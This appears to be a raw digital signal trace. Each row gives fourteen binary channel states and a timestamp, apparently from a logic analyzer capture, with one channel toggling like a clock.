0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610236e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610264e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610288e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610316e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610340e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610388e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610436e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1610444e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1610492e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1610516e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,1.1610520e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610524e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610540e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610564e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610612e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610664e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1610668e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1610716e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1610740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610748e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1610764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1610788e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1610796e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1610812e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1610836e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1610864e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1610888e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1610916e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1610940e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1610964e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1610988e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1611040e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1611068e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1611088e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1611116e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611120e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611164e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611236e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611268e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611288e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611316e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,1.1611340e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1611344e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1611364e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1611388e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1611412e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1611436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611444e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611492e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611516e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611540e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611564e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611612e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611664e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611688e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611716e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611812e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611864e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1611888e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1611916e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1611964e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1611988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1611996e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612040e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612064e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612088e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612116e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612164e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612212e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1612220e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1612264e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1612288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612296e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612316e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612340e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612388e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612436e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612464e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612488e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1612492e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1612540e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1612564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612572e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612612e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612664e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612688e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612716e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612812e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612864e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1612868e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1612916e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1612940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612948e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1612964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1612988e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613036e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613064e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613088e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1613092e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1613140e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1613164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613172e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613212e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613264e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613316e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613340e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613364e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1613368e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1613412e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1613436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613444e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613464e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613488e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1613492e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1613540e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1613564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613572e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613612e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613640e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1613668e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1613692e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1613716e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613724e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613792e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613816e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613840e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613868e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613892e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1613964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1613992e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614016e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614040e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614068e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614092e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614116e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614164e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1614172e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1614216e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1614244e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,1.1614248e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614252e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614268e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614292e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1614296e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1614340e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1614364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614372e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614392e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614416e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614440e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614468e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614492e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614516e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614540e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614564e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1614572e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1614616e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1614644e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614648e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614668e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614692e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614716e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614740e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614788e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614840e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614868e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614892e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614916e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614940e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1614964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1614988e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1615012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1615036e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1615068e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1615088e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1615116e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1615140e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1615164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1615188e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1615212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1615236e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1615268e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1615288e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1615316e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1615340e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1615368e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1615396e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1615420e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1615444e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1615468e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1615492e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1615500e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,1.1739800e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,1.1740048e-02 1,0,0,1,0,1,0,0,0,1,0,1,0,1,1.1740076e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,1.1740100e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,1,1.1740396e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,1.1740420e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,1.1740428e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,1.1740468e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,1.1740492e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,1.1740544e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,1.1740572e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,1.1740620e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,1.1740644e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,1.1740692e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1740696e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1740720e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1740724e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1740744e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1740768e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1740776e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1740796e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1740820e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1740824e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1740844e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1740868e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1740876e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1740920e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1740944e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1740996e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741020e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1741068e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741092e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1741144e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1741172e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1741196e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1741220e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741228e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1741244e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,1.1741268e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1741272e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1741292e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1741316e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741324e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1741368e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741392e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1741444e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741468e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1741516e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741540e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1741592e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741616e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1741620e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1741644e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1741668e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741676e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1741692e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741716e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,1.1741720e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1741724e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1741740e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1741764e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741772e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1741820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741844e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1741892e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741916e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1741964e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1741992e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742044e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742068e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1742072e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1742092e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1742116e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742124e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742140e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742164e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742192e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742216e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742244e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742268e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742292e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742316e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742344e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742368e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742396e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742420e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742444e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742468e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742492e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742516e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742572e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,1.1742596e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1742600e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1742644e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1742668e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742676e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742720e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742744e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742796e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742820e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742868e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742892e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1742900e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1742916e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1742944e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,1.1742948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742952e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1742968e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1742996e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743020e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743044e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743068e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743092e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743116e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743144e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743168e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1743196e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1743244e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743276e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743300e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743324e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743372e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1743380e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1743396e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1743424e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,1.1743428e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743432e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743476e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743500e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743548e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743572e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743624e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743648e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743700e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743724e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,1.1743728e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1743732e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1743748e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1743772e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743780e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743796e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743824e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743848e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743876e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743924e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1743972e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1743996e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744024e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1744048e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744076e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1744100e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744124e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1744148e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744172e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1744176e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1744220e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1744244e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1744272e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1744296e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744304e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1744348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744372e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1744420e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744444e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1744496e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1744524e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1744548e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1744572e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744580e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1744596e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744620e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1744644e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744672e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1744724e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744748e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1744796e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744820e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1744828e-02 